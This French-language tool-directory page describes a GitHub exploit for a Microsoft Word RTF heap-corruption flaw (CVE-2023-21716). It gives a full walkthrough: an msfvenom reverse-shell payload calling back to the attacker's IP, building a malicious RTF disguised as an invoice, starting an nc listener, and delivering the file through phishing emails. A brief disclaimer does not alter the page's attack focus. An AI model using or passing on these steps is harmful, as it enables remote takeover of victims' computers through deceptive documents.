Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
CVE-2023-21716 — CVE-2023-21716 - Microsoft Word RTF fonttbl Heap Corruption RCE exploit with reverse shell payload | Kitploit
Outils/GitHubGitHub/reggyraider/cve-2023-21716
Phishing ToolsPayload GenerationExploitationWeb Application ExploitationPenetration TestingLearning & EducationBinary Exploitation
GitHubreggyraider/cve-2023-21716

CVE-2023-21716

CVE-2023-21716 - Microsoft Word RTF fonttbl Heap Corruption RCE exploit with reverse shell payload

Voir le dépôt
2il y a 2 moisPas encore vérifié

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

CVE-2023-21716 — Microsoft Word RTF fonttbl Corruption du tas RCE

Gravité : Critique (CVSS 9.8)
Affecté : Microsoft Word 2013 / 2016 / 2019 / 2021 (non corrigé)
Correctif : Mardi des correctifs Microsoft février 2023
Auteur : REGGYRAIDER


Aperçu de la vulnérabilité

CVE-2023-21716 est une vulnérabilité de corruption du tas dans l'analyseur RTF de Microsoft Word (wwlib.dll).
Lorsque Word analyse une directive \fonttbl contenant plus de 32 767 entrées de police, un compteur signé 16 bits interne dépasse, corrompant les métadonnées du tas. Cela permet à un attaquant d'atteindre une exécution de code à distance simplement en envoyant à la victime un fichier .rtf malveillant.

Aucune macro. Aucune interaction utilisateur au-delà de l'ouverture du fichier.


Configuration et exploitation

Étape 1 — Générer le shellcode brut avec msfvenom

root@kitploit:~
msfvenom -p windows/x64/shell_reverse_tcp LHOST=<YOUR_IP> LPORT=4444 -f raw -o payload.bin

Étape 2 — Cloner ce dépôt

root@kitploit:~
git clone https://github.com/REGGYRAIDER/CVE-2023-21716
cd CVE-2023-21716

Étape 3 — Construire le RTF malveillant

root@kitploit:~
python3 exploit.py payload.bin invoice_march2024.rtf

Étape 4 — Démarrer votre écouteur

root@kitploit:~
nc -lvnp 4444

Étape 5 — Livrer le fichier

Télécharger via SMB, pièce jointe email, ou tout vecteur de phishing.
Lorsque la victime ouvre invoice_march2024.rtf dans un Word non corrigé, vous recevez un shell inversé.


Comment ça fonctionne

root@kitploit:~
Attacker creates RTF          Word parses \fonttbl        Heap corrupted
─────────────────────  ──►   ──────────────────────  ──►  ──────────────
\fonttbl with 32769+         Signed 16-bit counter        Attacker's
font definitions             overflows → 0x8000           shellcode runs
  1. L'exploit intègre 32 769 définitions de police \f<N> dans \fonttbl.
  2. Word alloue un tampon de taille fixe basé sur le compteur (maintenant dépassé).
  3. Les écritures de police suivantes vont au-delà du tampon alloué, corrompant les blocs de tas adjacents.
  4. Le shellcode brut (de payload.bin) est placé dans \pict et atterrit dans la région corrompue, obtenant l'exécution lorsque l'allocateur le traite.

Avertissement

Cet outil est destiné uniquement à des fins éducatives et à des tests de pénétration autorisés.
Utiliser cet exploit contre des systèmes dont vous ne possédez pas ou pour lesquels vous n'avez pas d'autorisation écrite explicite pour tester est illégal.
L'auteur décline toute responsabilité en cas d'utilisation abusive.


Références

  • Avis de sécurité Microsoft
  • Entrée NVD
Télécharger l’outil